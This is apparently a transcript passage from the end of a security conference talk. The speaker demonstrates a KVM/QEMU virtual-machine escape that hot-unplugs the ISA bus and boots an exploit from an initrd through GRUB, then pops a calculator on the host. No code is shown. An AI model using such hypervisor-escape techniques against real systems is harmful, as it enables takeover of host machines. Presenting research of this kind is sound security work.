So, well, that text is not relevant; I just ran a shell script that launched a KVM VM. I'm booting the VM into an Ubuntu kernel just to show that this is a working KVM virtual machine: we're in a VM, and /proc/cpuinfo shows that we're running on a QEMU CPU. The way I've implemented this exploit, because we're hot-unplugging the ISA bus, a lot of virtual devices go away, and if anyone tries to use those, there's a high risk of the machine segfaulting, which is not useful if we want to exploit it. So I've actually packaged my exploit into an initrd that contains a statically compiled version of my exploit, plus a minimal kernel that doesn't use any of those vulnerable devices, and I've put it in GRUB so that we can boot straight into the exploit and greatly increase the reliability of the attack. So we'll reboot the VM now, and from the GRUB prompt we'll select my exploit. It's doing things, chasing pointers... and we pop up a calculator in the host. And obviously, as I'm sure most of you are aware, the calculator is the standard demo payload; that could be arbitrary code. And, as you can see here, the guest kernel is very upset that its real-time clock has gone away, but it's valiantly soldiering on. All right, that's the end of this talk. The goons have told me that I shouldn't bother heading to the Q&A room because there's no one after me, so if you have questions, just come up here and we can chat.